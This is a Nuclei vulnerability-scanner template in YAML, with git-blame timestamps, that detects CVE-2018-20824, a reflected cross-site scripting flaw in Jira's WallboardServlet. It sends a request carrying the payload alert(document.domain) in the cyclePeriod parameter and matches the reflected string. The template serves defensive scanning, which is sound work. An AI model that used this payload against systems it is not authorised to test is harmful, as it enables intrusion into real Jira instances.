nuclei-templates/cves/CVE-2018-20824.yaml

20 lines
420 B
YAML
Raw Normal View History

2020-06-22 13:35:37 +00:00
id: CVE-2018-20824
info:
name: Atlassian Jira WallboardServlet XSS
author: madrobot
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"
matchers:
- type: status
status:
2020-06-22 21:51:54 +00:00
- 200
2020-06-22 13:35:37 +00:00
- type: word
words:
2020-06-22 21:51:54 +00:00
- alert(document.domain)
2020-06-22 13:35:37 +00:00
part: body